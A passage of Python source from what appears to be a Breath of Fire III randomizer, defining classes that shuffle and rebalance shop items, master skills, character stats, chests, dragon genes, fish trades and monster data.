flame_chrysm = AcquireItemMixin.get_item_by_type_index(1, 0x47)\n assert 'Flame Chrysm' in flame_chrysm.name\n if flame_chrysm not in self.items:\n new_items = list(self.items)\n if (len(new_items) >=\n len(self.old_data['item_type_item_indexes'])):\n to_remove = random.choice(new_items)\n new_items.remove(to_remove)\n new_items = [flame_chrysm] + new_items\n self.set_items(new_items)\n\n def cleanup(self):\n sorted_items = sorted(\n self.items, key=lambda i: (\n self.item_type_from_item(i),\n i.equip_type if isinstance(i, ArmorObject) else 0,\n i.name))\n sorted_items = [i for i in sorted_items if i.index > 0]\n if not 0x11 <= self.index <= 0x16: # faerie shops\n self.set_items(sorted_items)\n\n self.num_items = len([i for i in self.item_type_item_indexes if i])\n\n while len(self.items) < len(self.old_data['item_type_item_indexes']):\n self.item_type_item_indexes.append(0)\n\n\nclass MasterSkillsObject(TableObject):\n flag = 'm'\n flag_description = 'masters'\n custom_random_enable = 'm'\n\n RESTRICTED_NAMES = ['Bais', 'Lang', 'Lee', 'Wynn']\n\n @classproperty\n def after_order(self):\n return [BaseStatsObject]\n\n def __repr__(self):\n if self.name in self.RESTRICTED_NAMES:\n return ''\n\n s = ''\n for level, skill in zip(self.levels, self.skills):\n s += 'LV{0:0>2} {1}\\n'.format(level, skill.name)\n return s.strip()\n\n @property\n def levels(self):\n levels = [skill_level & 0xff for skill_level in self.skill_levels\n if skill_level >> 8 != 0xff]\n assert all([1 <= level <= 98 for level in levels])\n return levels\n\n @property\n def skills(self):\n return [AbilityObject.get(skill_level >> 8)\n for skill_level in self.skill_levels\n if skill_level >> 8 != 0xff]\n\n @property\n def name(self):\n return MasterStatsObject.names[self.index]\n\n def set_skills(self, skills, levels):\n skill_indexes = [a.index for a in skills]\n temp_levels = sorted(levels)\n assert len(skill_indexes) == len(levels)\n while len(skill_indexes) < len(self.old_data['skill_levels']):\n skill_indexes.append(0xFF)\n temp_levels.append(0x63)\n self.skill_levels = [\n l | (i << 8) for (i, l) in zip(skill_indexes, temp_levels)]\n assert self.skills == skills\n assert self.levels == levels\n\n def mutate(self):\n if AbilityObject.flag not in get_flags():\n return\n if self.name in self.RESTRICTED_NAMES:\n return\n\n banned_skills = {\n AbilityObject.get(l.ability) for l in LevelObject.every\n if l.ability > 0\n and l.charname not in BaseStatsObject.RESTRICTED_NAMES}\n candidates = [a for a in AbilityObject.every if a.rank >= 0\n and a not in banned_skills and a is a.examine_alt]\n\n target_nums = [len(mso.skills) for mso in self.every\n if mso.name not in self.RESTRICTED_NAMES]\n target_num_skills = random.choice(target_nums)\n new_skills = []\n for _ in range(1000):\n if len(new_skills) >= target_num_skills:\n break\n base = random.choice(self.skills)\n assert base.intershuffle_valid\n new_skill = base.get_similar(candidates=candidates,\n override_outsider=True,\n random_degree=self.random_degree)\n assert new_skill is new_skill.examine_alt\n if new_skill not in new_skills:\n new_skills.append(new_skill)\n else:\n target_num_skills = len(new_skills)\n new_levels = random.choice([mso.levels for mso in self.every\n if len(mso.levels) == target_num_skills])\n self.set_skills(new_skills, new_levels)\n\n @classmethod\n def full_preclean(cls):\n backhand = [a for a in AbilityObject.every\n if a.old_name == 'Backhand'][0]\n valid_backhand_masters = [\n mso for mso in MasterSkillsObject.every if mso.name not in\n 
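# Backhand may be assigned to any master except the fixed masters and Hondara\n            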
MasterSkillsObject.RESTRICTED_NAMES + ['Hondara']]\n existing = [mso for mso in valid_backhand_masters\n if backhand in mso.skills]\n if not existing:\n candidates = [mso for mso in valid_backhand_masters\n if len(mso.skills) < 6]\n chosen = random.choice(candidates)\n skills, levels = chosen.skills, chosen.levels\n candidates = [l for l in range(min(levels), max(levels))\n if l not in levels]\n if not candidates:\n candidates = [max(levels)+1]\n levels = sorted(levels + [random.choice(candidates)])\n max_index = len(skills)\n skills.insert(random.randint(0, max_index), backhand)\n chosen.set_skills(skills, levels)\n\n super().full_preclean()\n\n def preclean(self):\n if self.name in self.RESTRICTED_NAMES:\n return\n\n for skill in self.skills:\n skill.set_bit('examinable', True)\n skill.reset_skill_type(AbilityObject.EXAMINE_SKILL)\n\n def cleanup(self):\n if self.name in self.RESTRICTED_NAMES:\n for attr in self.old_data:\n setattr(self, attr, self.old_data[attr])\n return\n\n for skill in self.skills:\n assert skill.get_bit('examinable')\n assert skill.skill_type & 3 == AbilityObject.EXAMINE_SKILL\n\n\nclass MasterStatsObject(TableObject):\n flag = 'm'\n custom_random_enable = 'm'\n names = [\n 'Bunyan', 'Mygas', 'Yggdrasil', \"D'lonzo\", 'Fahl',\n 'Durandal', 'Giotto', 'Hondara', 'Emitai', 'Deis',\n 'Hachio', 'Bais', 'Lang', 'Lee', 'Wynn',\n 'Ladon', 'Meryleep',\n ]\n\n def __repr__(self):\n s = 'MASTER {0:0>2X} {1}\\n'.format(self.index, self.name)\n for attr, _, _ in self.specsattrs:\n value = getattr(self, attr)\n if value >= 0x80:\n value = value - 0x100\n if value > 0:\n value = '+%s' % value\n s += '{0}: {1:2} | '.format(attr.upper(), value)\n s = s.strip().rstrip('|').strip()\n s = '{0}\\n{1}'.format(s, MasterSkillsObject.get(self.index))\n return s.strip()\n\n def read_data(self, filename=None, pointer=None):\n super().read_data(filename=filename, pointer=pointer)\n for attr in self.old_data:\n value = getattr(self, attr)\n assert self.old_data[attr] == value\n if value >= 0x80:\n value = value - 0x100\n setattr(self, attr, value)\n self.old_data[attr] = value\n\n @property\n def name(self):\n return self.names[self.index]\n\n @property\n def rating(self):\n return sum(v for v in self.old_data.values())\n\n def randomize(self):\n ratings = [mso.rating for mso in self.every]\n target_rating = random.choice(ratings)\n swappable_stats = [('hp', 'ap'), ('pwr', 'dfn', 'agi', 'int')]\n stat_pools = defaultdict(list)\n for attr in self.old_data:\n swappable = [s for s in swappable_stats if attr in s][0]\n for stat in swappable:\n for mso in self.every:\n stat_pools[attr].append(mso.old_data[stat])\n stat_pools[attr] = sorted(stat_pools[attr])\n setattr(self, attr, random.choice(stat_pools[attr]))\n\n while True:\n rating = sum(getattr(self, attr) for attr in self.old_data)\n if rating == target_rating:\n break\n\n attr = random.choice(sorted(self.old_data))\n setattr(self, attr, random.choice(stat_pools[attr]))\n\n def cleanup(self):\n for attr in self.old_data:\n value = getattr(self, attr)\n if value < 0:\n value = value + 0x100\n assert 0 <= value <= 0xff\n setattr(self, attr, value)\n\n\nclass BaseStatsObject(NameMixin):\n flag = 'c'\n flag_description = 'characters'\n custom_random_enable = 'c'\n RESTRICTED_NAMES = ['Teepo', 'Whelp']\n\n randomselect_attributes = [\n 'surprise_chance', 'reprisal_chance', 'critical_chance',\n 'evasion', 'accuracy']\n\n def __repr__(self):\n stats = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n s = '{0:0>2X} {1}\\n'.format(self.index, self.name)\n s 
+= ' | '.join('{0:3}: {1:>2}'.format(\n stat.upper(), getattr(self, stat)) for stat in stats) + '\\n'\n for l in self.levels:\n if l.ability > 0:\n skill = AbilityObject.get(l.ability)\n s += ' - LV{0:0>2} {1} ({2})\\n'.format(l.level,\n skill.name, skill.cost)\n return s.strip()\n\n @property\n def intershuffle_valid(self):\n return self.name not in self.RESTRICTED_NAMES\n\n @property\n def all_abilities(self):\n return [AbilityObject.get(a) for a in\n self.healing_abilities + self.assist_abilities +\n self.attack_abilities + self.skills_abilities\n if AbilityObject.get(a).name]\n\n @cached_property\n def levels(self):\n return [l for l in LevelObject.every if l.index // 99 == self.index]\n\n @cached_property\n def delevel_stats(self):\n stats = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n stats_values = {}\n for stat in stats:\n assert self.old_data[stat] == self.old_data['base_%s' % stat]\n stats_values[stat] = self.old_data[stat]\n\n for i in range(self.level, 1, -1):\n level_data = self.levels[i-1]\n for stat in stats:\n stats_values[stat] -= level_data.get_old_stat(stat)\n return stats_values\n\n def relevel_stats(self, stats_values=None):\n if not self.levels:\n return stats_values\n if stats_values is None:\n stats_values = self.delevel_stats\n for i in range(self.level + 1):\n level_data = self.levels[i]\n for stat in sorted(stats_values):\n stats_values[stat] += getattr(level_data, stat)\n return stats_values\n\n def mutate_skills(self):\n if not self.levels:\n return\n\n base_characters = [bso for bso in BaseStatsObject.every\n if bso.intershuffle_valid]\n base = random.choice(base_characters)\n base_levels = [l for l in base.levels if l.old_data['ability'] > 0]\n new_skills = []\n elements1 = ['fire', 'ice', 'lightning', 'wind']\n elements2 = ['earth', 'holy']\n elements = elements1 + elements2\n random.shuffle(elements1)\n random.shuffle(elements2)\n shuffled_elements = elements1 + elements2\n skill_type_counts = defaultdict(int)\n SKILL_TYPE_MAX_COUNT = 10\n for l in base_levels:\n l.ability = 0\n for _ in range(1000):\n base_rank = AbilityObject.get(\n l.old_data['ability']).levelup_alt\n base_misc = AbilityObject.get(\n random.choice(base_levels).old_data['ability'])\n\n skill_type = base_misc.calculate_skill_type()\n skill_count = skill_type_counts[skill_type]\n if skill_count >= SKILL_TYPE_MAX_COUNT:\n assert skill_count == SKILL_TYPE_MAX_COUNT\n continue\n\n assert base_rank.index != 0 and base_misc.index != 0\n candidates = [\n c for c in AbilityObject.every\n if c.is_offense == base_misc.is_offense\n and c.is_utility == base_misc.is_utility\n and c is c.levelup_alt and c.rank >= 0\n and c.old_name not in AbilityObject.LEVELUP_BANNED_SKILLS]\n for e in shuffled_elements:\n if base_misc.get_bit(e):\n index = shuffled_elements.index(e)\n new_element = elements[index]\n candidates = [c for c in candidates\n if c.get_bit(new_element)]\n break\n if not candidates:\n continue\n\n new_skill = base_rank.get_similar(\n candidates=candidates, override_outsider=True,\n random_degree=AbilityObject.random_degree,\n allow_intershuffle_invalid=True)\n new_skill = new_skill.levelup_alt\n\n assert base_rank in candidates or new_skill is not base_rank\n if new_skill not in new_skills:\n if new_skill.skill_type & 3 != AbilityObject.EXAMINE_SKILL:\n skill_type = new_skill.skill_type & 3\n count = skill_type_counts[skill_type]\n if (count >= SKILL_TYPE_MAX_COUNT):\n continue\n else:\n new_skill.reset_skill_type()\n if new_skill.get_bit('examinable'):\n new_skill.set_bit('examinable', False)\n 
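# the chosen skill is now reserved for level-up learning, not Examine\n                    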
new_skills.append(new_skill)\n skill_type_counts[skill_type] += 1\n break\n\n base_levels = base_levels[:len(new_skills)]\n assert len(new_skills) == len(base_levels)\n base_level_levels = [l.level for l in base_levels]\n lower, upper = min(base_level_levels), max(base_level_levels)\n final_levels = []\n for l in base_level_levels:\n while True:\n l = mutate_normal(l, minimum=lower, maximum=upper,\n random_degree=AbilityObject.random_degree)\n if l not in final_levels:\n final_levels.append(l)\n break\n final_levels = sorted(set(final_levels))\n assert len(final_levels) == len(new_skills)\n level_skills = dict(zip(final_levels, new_skills))\n\n for l in self.levels:\n if l.level in level_skills:\n l.ability = level_skills[l.level].index\n else:\n l.ability = 0\n\n def randomize_resistances(self):\n elemental_resistances = []\n status_resistances = []\n for bso in BaseStatsObject.every:\n if not bso.intershuffle_valid:\n continue\n elemental_resistances += bso.resistances[:5]\n status_resistances += bso.resistances[-3:]\n resistances = (\n [random.choice(elemental_resistances) for _ in range(5)] +\n [5] + [random.choice(status_resistances) for _ in range(3)])\n resistances = [mutate_normal(r, 0, 7, random_degree=self.random_degree)\n for r in resistances]\n self.resistances = resistances\n assert len(self.resistances) == len(self.old_data['resistances'])\n\n def mutate_stats(self):\n bases = [bso for bso in BaseStatsObject.every\n if bso.name not in bso.RESTRICTED_NAMES]\n stats = sorted(self.delevel_stats.keys())\n chosen_bases = {}\n initial_stats = {}\n for s in stats:\n chosen_bases[s] = random.choice(bases)\n for (i, old_l) in enumerate(self.levels):\n if i == 0:\n continue\n i = mutate_normal(i, 1, 98, random_degree=self.random_degree)\n new_l = chosen_bases[s].levels[i]\n new_value = new_l.get_old_stat(s)\n old_l.set_stat(s, new_value)\n initial_stats[s] = chosen_bases[s].delevel_stats[s]\n\n new_stats = self.relevel_stats(initial_stats)\n for attr, value in sorted(new_stats.items()):\n assert hasattr(self, attr)\n setattr(self, attr, value)\n\n def mutate(self):\n super().mutate()\n self.mutate_stats()\n self.randomize_resistances()\n self.reseed('skills')\n if AbilityObject.flag in get_flags():\n self.mutate_skills()\n\n def cleanup(self):\n weapon = WeaponObject.get(self.weapon)\n if not weapon.get_bit(self.name.lower()) and weapon.name != 'Nothing':\n candidates = [w for w in WeaponObject.ranked if\n w.get_bit(self.name.lower())]\n temp = [c for c in candidates\n if bin(c.equipability & 0xF7).count('1') == 1]\n if temp:\n candidates = temp\n self.weapon = candidates[0].index\n\n for attr in ['shield', 'helmet', 'armor']:\n armor = ArmorObject.get(getattr(self, attr))\n if not armor.get_bit(self.name.lower()):\n setattr(self, attr, 0)\n\n accessories = [AccessoryObject.get(a) for a in self.accessories]\n accessories = [a for a in accessories if a.get_bit(self.name.lower())]\n accessories = [a.index for a in accessories]\n while len(accessories) < 2:\n accessories.append(0)\n\n ability_check = (self.flag in get_flags() and\n AbilityObject.flag in get_flags())\n if ability_check:\n for ability_type in ['healing', 'assist', 'attack', 'skills']:\n setattr(self, '%s_abilities' % ability_type, list([]))\n\n for l in self.levels:\n if l.ability > 0:\n skill = AbilityObject.get(l.ability)\n skill_type = skill.skill_type & 3\n if self.name not in self.RESTRICTED_NAMES:\n try:\n assert not skill.get_bit('examinable')\n assert skill_type != AbilityObject.EXAMINE_SKILL\n except 
AssertionError:\n if MasterSkillsObject.flag not in get_flags():\n if not hasattr(BaseStatsObject, '_warn_msg'):\n print('Warning: Without random masters, '\n 'skill conflict cannot be resolved.')\n BaseStatsObject._warn_msg = True\n else:\n raise Exception('Skill conflict.')\n\n if l.level <= self.level:\n if skill_type == AbilityObject.HEALING_SKILL:\n self.healing_abilities.append(skill.index)\n elif skill_type == AbilityObject.ASSIST_SKILL:\n self.assist_abilities.append(skill.index)\n elif skill_type == AbilityObject.ATTACK_SKILL:\n self.attack_abilities.append(skill.index)\n elif skill_type == AbilityObject.EXAMINE_SKILL:\n self.skills_abilities.append(skill.index)\n\n for ability_type in ['healing', 'assist', 'attack', 'skills']:\n attr = '%s_abilities' % ability_type\n values = getattr(self, attr)\n assert all(a for a in values)\n assert len(set(values)) == len(values)\n while len(getattr(self, attr)) < len(self.old_data[attr]):\n getattr(self, attr).append(0)\n assert len(getattr(self, attr)) == len(self.old_data[attr])\n else:\n for ability_type in ['healing', 'assist', 'attack', 'skills']:\n attr = '%s_abilities' % ability_type\n assert getattr(self, attr) == self.old_data[attr]\n\n\n for attr in sorted(self.old_data):\n if (attr in ['weapon', 'shield', 'helmet', 'armor', 'accessories']\n and EquipmentObject.flag in get_flags()):\n continue\n if self.flag not in get_flags():\n assert getattr(self, attr) == self.old_data[attr]\n other_attrs = ['base_%s' % attr, 'current_%s' % attr]\n for other in other_attrs:\n if other in self.old_data:\n setattr(self, other, getattr(self, attr))\n\n if self.name == 'Whelp':\n self.attack_abilities = self.old_data['attack_abilities']\n\n if self.name == 'Ryu':\n for l in LevelObject.every:\n if l.ability > 0:\n skill = AbilityObject.get(l.ability)\n if skill.old_name in ['Pilfer', 'Steal']:\n break\n else:\n pilfer = [a for a in AbilityObject.every\n if a is a.examine_alt and a.old_name == 'Pilfer'][0]\n pilfer.set_bit('examinable', True)\n pilfer.reset_skill_type(AbilityObject.EXAMINE_SKILL)\n self.skills_abilities.remove(0)\n self.skills_abilities.insert(0, pilfer.index)\n assert (len(self.skills_abilities) ==\n len(self.old_data['skills_abilities']))\n\n if 'easymodo' in get_activated_codes() or self.name == 'Whelp':\n self.accuracy = 100\n self.base_accuracy = 100\n self.current_hp = 999\n self.max_hp = 999\n self.base_max_hp = 999\n\n\nclass BaseStats2Object(TableObject):\n @classproperty\n def after_order(self):\n return [BaseStatsObject]\n\n def cleanup(self):\n for attr in self.old_data:\n assert (self.old_data[attr] ==\n BaseStatsObject.get(self.index).old_data[attr])\n setattr(self, attr, getattr(BaseStatsObject.get(self.index), attr))\n\n\nclass ManilloStockObject(TableObject):\n def __repr__(self):\n s = 'TRADER {0:0>2X} ({1})\\n'.format(self.index, self.name.upper())\n for t in self.trades:\n s += ' %s\\n' % t\n return s.strip()\n\n @property\n def name(self):\n return {\n 0: 'Farm',\n 2: 'Tower',\n 7: 'Urkan Tapa',\n 9: 'Dauna Mine',\n 0xb: 'Cliff',\n 0xd: 'Steel Beach',\n 0xf: 'Kombinat',\n }[self.index]\n\n @property\n def trades(self):\n return [ManilloItemObject.get(i)\n for i in self.trade_indexes if i != 0xFF]\n\n\nclass ChestObject(DupeMixin, AcquireItemMixin):\n flag_description = 'treasure'\n\n def __repr__(self):\n if self.item:\n s = 'CHEST {0:0>2X} ({1:0>3}-{2:0>2x}): {3}'.format(\n self.index, self.area_code, self.memory, self.item.name)\n else:\n assert self.item_type == 0xFF\n zenny = '{0}Z'.format(self.value)\n s = 
'CHEST {0:0>2X} ({1:0>3}-{2:0>2x}): {3}'.format(\n self.index, self.area_code, self.memory, zenny)\n return s\n\n @property\n def value(self):\n if self.item:\n return self.item.old_data['price']\n assert self.item_type == 0xFF\n return self.item_index * 40\n\n @property\n def area_code(self):\n filename = self.filename[-11:]\n assert filename.startswith('AREA') and filename.endswith('.EMI')\n return int(filename[-7:-4])\n\n @property\n def area_name(self):\n if hasattr(self, '_area_name'):\n return self._area_name\n\n area_names = {}\n with open(path.join(tblpath, 'names_areas.txt')) as f:\n for line in f:\n index, description = line.strip().split(' ', 1)\n index = int(index)\n if '(' in description:\n area, location = description.split('(', 1)\n location = '(' + location\n else:\n area = description\n location = ''\n area = area.upper()\n location = location.lower()\n area_names[index] = '{0} {1}'.format(area, location).strip()\n\n for c in ChestObject.every:\n c._area_name = area_names[c.area_code]\n\n return self.area_name\n\n def cleanup(self):\n super().cleanup()\n\n if 'thinkwell' in get_activated_codes() and self.memory == 2:\n self.item_type, self.item_index = 4, 0xf\n\n\nclass GeneObject(TableObject):\n flag = 'g'\n flag_description = 'dragon gene locations'\n intershuffle_attributes = ['gene_index']\n\n def cleanup(self):\n if self.gene_index == 0x21:\n assert 'patch_flame_gene.txt' in get_activated_patches()\n self.gene_index = 0\n assert 0 <= self.gene_index <= 0x11\n\n\nclass ChrysmObject(TableObject):\n @classproperty\n def after_order(self):\n return [GeneObject]\n\n @property\n def gene(self):\n genes = [g for g in GeneObject.every if g.filename == self.filename]\n assert len(genes) == 1\n gene = genes[0]\n assert gene.old_data['gene_index'] == self.old_data['gene_index']\n return gene\n\n def cleanup(self):\n self.gene_index = self.gene.gene_index\n\n\nclass FormationObject(TableObject):\n def __repr__(self):\n s = 'FORMATION {0:0>3X} ({1}): '.format(\n self.index, self.appearance_rate)\n counts = dict(Counter(self.enemies))\n if None in counts:\n del(counts[None])\n if not counts:\n s += 'Nothing'\n return s.strip()\n monster_counts = sorted(counts.items(),\n key=lambda item: (counts[item[0]], item[0].name))\n s += ', '.join(['{0} x{1} '.format(monster.name, count)\n for monster, count in monster_counts])\n return s.strip()\n\n @cached_property\n def available_enemies(self):\n return [e for e in MonsterObject.every if e.filename == self.filename]\n\n @property\n def enemies(self):\n return [self.available_enemies[eid] if eid < 0xff else None\n for eid in self.monster_indexes]\n\n def cleanup(self):\n if 'easymodo' in get_activated_codes():\n self.appearance_rate = 0\n if self.old_data['appearance_rate'] != 0:\n self.monster_indexes = [0xff]*8\n\n\nclass ManilloItemObject(DupeMixin, AcquireItemMixin):\n flag = 's'\n custom_random_enable = 's'\n\n def __repr__(self):\n fishdesc = ', '.join(\n '{0} x{1}'.format(fish.name, n) for (fish, n) in self.fishes)\n s = '{1} ({2})'.format(self.index, self.item.name, fishdesc)\n return s.strip()\n\n @property\n def fishes(self):\n fishes = []\n for i, n in zip(self.fish_indexes, self.fish_quantities):\n if i == 0xFF or n == 0:\n continue\n fish = ItemObject.get(0x38 + i)\n fishes.append((fish, n))\n return fishes\n\n def mutate(self):\n if not self.is_canonical:\n return\n\n super().mutate(unique=True)\n if self.random_degree == 0:\n return\n\n old_fish_value = 0\n for (fish, n) in self.fishes:\n old_fish_value += 
(fish.old_data['price'] * n)\n\n values = [self.old_item.old_data['price'],\n self.old_item.price,\n self.item.old_data['price'],\n self.item.price]\n\n old_item_value = self.old_item.old_data['price']\n target_value = random.randint(min(values), max(values))\n target_fish_value = target_value * old_fish_value / old_item_value\n new_fishes = [(None, 0), (None, 0), (None, 0)]\n candidate_fishes = sorted(\n [ItemObject.get(i) for i in range(0x38, 0x4d)],\n key=lambda i: i.old_data['price'])\n target_fish_value = max(\n target_fish_value, min([f.old_data['price']\n for f in candidate_fishes]))\n candidate_fishes = [c for c in candidate_fishes\n if c.old_data['price'] <= target_fish_value * 2]\n max_index = len(candidate_fishes)-1\n stagnation_counter = 0\n MAX_STAGNATION = 20\n while True:\n index = int(round(\n (random.random() ** (1/self.random_degree)) * max_index))\n replacement_fish = candidate_fishes[index]\n for (fish, n) in new_fishes:\n if fish == replacement_fish:\n replace_fish = fish\n replace_quantity = n\n replacement_quantity = n + 1\n break\n else:\n replace_fish, replace_quantity = random.choice(new_fishes)\n if replace_fish is not None:\n replace_value = (replace_fish.old_data['price']\n * replace_quantity)\n replacement_quantity = ceil(\n replace_value / replacement_fish.old_data['price'])\n else:\n replacement_quantity = random.randint(\n 1, random.randint(1, 9))\n\n if 1 <= replacement_quantity <= 9:\n stagnation_counter = 0\n new_fishes.remove((replace_fish, replace_quantity))\n new_fishes.append((replacement_fish, replacement_quantity))\n else:\n stagnation_counter += 1\n if stagnation_counter >= MAX_STAGNATION:\n break\n continue\n\n current_value = 0\n for (fish, n) in new_fishes:\n if fish is None:\n continue\n current_value += (fish.old_data['price'] * n)\n if current_value >= target_fish_value:\n break\n\n new_fishes = sorted(\n new_fishes, key=lambda f: (99999 if f[0] is None else f[0].index))\n self.fish_indexes = [fish.index-0x38 if fish else 0xFF\n for fish, n in new_fishes]\n self.fish_quantities = [n if fish else 0 for fish, n in new_fishes]\n\n\nclass MonsterObject(DupeMixin, NameMixin):\n flag = 'e'\n flag_description = 'enemies'\n custom_random_enable = 'e'\n custom_difficulty_enable = False\n difficulty_attrs = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n randomselect_attributes = [\n 'hp', 'ap', 'pwr', 'dfn', 'agi', 'int',\n ('steal_item_type', 'steal_item_index', 'steal_rate'),\n ('drop_item_type', 'drop_item_index', 'drop_rate'),\n 'resistances']\n\n mutate_attributes = {\n 'hp': (1, 65000),\n 'ap': None,\n 'pwr': None,\n 'dfn': None,\n 'agi': None,\n 'int': None,\n 'steal_rate': None,\n 'drop_rate': None,\n }\n\n RESISTANCES_NAMES = ['Fire', 'Frost', 'Thunder', 'Earth', 'Wind',\n 'Holy', 'Psionic', 'Status', 'Death']\n\n def __repr__(self):\n s = '{0:0>3X} LV{1:>3} {2}{3}\\n'.format(\n self.index, self.level, self.name,\n '' if self.is_canonical else '*')\n stats = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n s += ' - '.join('{0}:{1}'.format(\n stat.upper(), getattr(self, stat)) for stat in stats) + '\\n'\n for i in range(3):\n resistances_names = self.RESISTANCES_NAMES[(i*3):(i*3)+3]\n resistances = self.resistances[(i*3):(i*3)+3]\n s += ' | '.join('{0:7} {1}'.format(\n a, b) for (a, b) in zip(resistances_names, resistances)) + '\\n'\n steal_rate = (2**self.steal_rate) / 128 if self.steal_rate else 0\n steal_rate = int(round(steal_rate*100))\n s += 'Steal: {0} {1}%\\n'.format(\n self.steal_item.name if self.steal_item else None, steal_rate)\n drop_rate = 
(2**self.drop_rate) / 128 if self.drop_rate else 0\n drop_rate = int(round(drop_rate*100))\n s += 'Drop: {0} {1}%\\n'.format(\n self.drop_item.name if self.drop_item else None, drop_rate)\n skills = []\n for a in sorted(self.abilities, key=lambda x: x.name):\n if a.old_name in ['Nothing', 'Noting'] or not a.old_name:\n continue\n skills.append('{0}{1}'.format(\n a.name, '*' if a.get_bit('examinable') else ''))\n s += ', '.join(skills) + '\\n'\n return s.strip()\n\n @property\n def abilities(self):\n abilities = set(self.initial_skills)\n for i in range(1, 5):\n condition = getattr(self, 'condition%s' % i)\n if condition >= 99:\n assert condition == 99\n continue\n abilities |= set(getattr(self, 'skills%s' % i))\n abilities = [AbilityObject.get(a) for a in sorted(abilities)]\n return abilities\n\n @property\n def is_boss(self):\n if hasattr(self, '_is_boss'):\n return self._is_boss\n\n if not self.is_canonical:\n return self.canonical_relative.is_boss\n\n for m in MonsterObject.every:\n m._is_boss = True\n\n for f in FormationObject.every:\n if f.appearance_rate == 0:\n continue\n for m in f.enemies:\n if m is not None:\n m._is_boss = False\n\n return self.is_boss\n\n @property\n def rank(self):\n if hasattr(self, '_rank'):\n return self._rank\n\n if not self.name:\n return -1\n\n if not self.is_canonical:\n return self.canonical_relative.rank\n\n canons = [m for m in MonsterObject.every if m.is_canonical and m.name]\n canons = sorted(canons, key=lambda m: (m.signature, m.index))\n\n by_hp = sorted(canons, key=lambda m: m.old_data['hp'])\n by_level = sorted(canons, key=lambda m: m.old_data['level'])\n by_exp = sorted(canons, key=lambda m: m.old_data['exp'])\n max_index = len(canons)-1\n\n for n, m in enumerate(by_hp):\n m._hp_rank = n / max_index\n\n for n, m in enumerate(by_level):\n m._level_rank = n / max_index\n\n for n, m in enumerate(by_exp):\n m._exp_rank = n / max_index\n\n for m in canons:\n ranks = []\n if 1 <= m.old_data['hp'] <= 0xFFFE:\n ranks.append(m._hp_rank)\n if 1 <= m.old_data['level']:\n ranks.append(m._level_rank)\n\n if 1 <= m.old_data['exp']:\n ranks.append(m._exp_rank)\n elif 1 <= m.old_data['hp'] <= 0xFFFE:\n ranks.append(max(m._hp_rank, m._level_rank))\n\n m._rank = sum(ranks) / len(ranks)\n\n return self.rank\n\n @property\n def intershuffle_valid(self):\n return self.name and self.is_canonical and not self.is_boss\n\n def mutate_resistances(self):\n elemental_resistances = self.resistances[:5]\n status_resistances = self.resistances[-3:]\n random.shuffle(elemental_resistances)\n random.shuffle(status_resistances)\n self.resistances[:5] = elemental_resistances\n self.resistances[-3:] = status_resistances\n self.resistances = [\n mutate_normal(r, 0, 7, random_degree=self.random_degree)\n for r in self.resistances]\n\n @property\n def steal_item(self):\n if self.steal_rate == 0:\n return None\n item = ChestObject.get_item_by_type_index(self.steal_item_type,\n self.steal_item_index)\n return item\n\n @property\n def drop_item(self):\n if self.drop_rate == 0:\n return None\n item = ChestObject.get_item_by_type_index(self.drop_item_type,\n self.drop_item_index)\n return item\n\n def mutate_loot(self):\n item = self.steal_item\n if item is not None:\n item = item.get_similar(random_degree=ChestObject.random_degree)\n self.steal_item_type = ItemMixin.item_type_from_item(item)\n self.steal_item_index = item.index\n\n item = self.drop_item\n if item is not None:\n item = item.get_similar(random_degree=ChestObject.random_degree)\n self.drop_item_type = 
ItemMixin.item_type_from_item(item)\n self.drop_item_index = item.index\n\n def mutate_skills(self):\n if not self.intershuffle_valid:\n return\n\n ai_swap = self.get_similar(\n random_degree=MonsterAbilityObject.random_degree)\n self.initial_skills = list(getattr(ai_swap, 'initial_skills'))\n for i in range(1, 5):\n for attr in ['condition', 'ai_unknown', 'skills']:\n attr = '%s%s' % (attr, i)\n setattr(self, attr, ai_swap.old_data[attr])\n\n existing_skills = set([])\n for attr in ['initial_skills',\n 'skills1', 'skills2', 'skills3', 'skills4']:\n skills = [AbilityObject.get(s) for s in getattr(self, attr)]\n existing_skills |= set(skills)\n\n existing_skills = sorted(existing_skills, key=lambda s: s.index)\n skill_map = {}\n for existing in existing_skills:\n if existing.rank < 0:\n skill_map[existing.index] = existing.index\n continue\n\n candidates = [s for s in AbilityObject.ranked if s is s.examine_alt\n and existing.is_offense == s.is_offense\n and existing.is_utility == s.is_utility\n and s.rank >= 0]\n new_skill = existing.examine_alt.get_similar(\n candidates, random_degree=MonsterAbilityObject.random_degree)\n skill_map[existing.index] = new_skill.index\n\n for attr in ['initial_skills',\n 'skills1', 'skills2', 'skills3', 'skills4']:\n skills = [skill_map[s] for s in getattr(self, attr)]\n setattr(self, attr, skills)\n\n def mutate(self):\n if self.is_canonical:\n super().mutate()\n self.mutate_resistances()\n self.mutate_loot()\n self.reseed('skills')\n\n def difficulty_boost(self):\n if self.random_difficulty == 1.0:\n return\n\n monsters = [m for m in MonsterObject.ranked\n if m.is_canonical and m.rank >= 0]\n if self not in monsters:\n return\n\n if self.random_difficulty > 1.0:\n difficulty = self.random_difficulty - 1\n index = monsters.index(self)\n ranked_ratio = index / (len(monsters)-1)\n difficulty = (difficulty * ranked_ratio) + 1\n else:\n difficulty = self.random_difficulty\n\n for diffattr in self.difficulty_attrs:\n value = getattr(self, diffattr)\n value = int(round(value * random.uniform(1.0, difficulty)))\n if diffattr == 'hp':\n value2 = int(round(value * random.uniform(1.0, difficulty)))\n value = max(value, value2)\n\n length = [l for (attr, l, _) in self.specsattrs\n if attr == diffattr][0]\n assert 1 <= length <= 2\n if length == 1:\n value = min(value, max(0xFE, self.old_data[diffattr]))\n elif length == 2:\n value = min(value, max(0xFFFE, self.old_data[diffattr]))\n\n setattr(self, diffattr, value)\n\n new_resistances = []\n for r in self.resistances:\n assert 0 <= r <= 7\n r = int(round(r * random.uniform(1.0, difficulty)))\n r = max(0, min(r, 7))\n new_resistances.append(r)\n self.resistances = new_resistances\n\n def preclean(self):\n self.reseed('difficulty')\n self.difficulty_boost()\n\n if self.is_boss and self.random_difficulty >= 1.0:\n for attr in self.difficulty_attrs:\n value = getattr(self, attr)\n value = max(value, self.old_data[attr])\n setattr(self, attr, value)\n\n if self.name in ['Gary', 'Mogu']:\n for attr in self.difficulty_attrs:\n setattr(self, attr, self.old_data[attr])\n\n def cleanup(self):\n if ChestObject.flag not in get_flags():\n for attr in ['steal_item_index', 'steal_item_type', 'steal_rate',\n 'drop_item_index', 'drop_item_type', 'drop_rate']:\n setattr(self, attr, 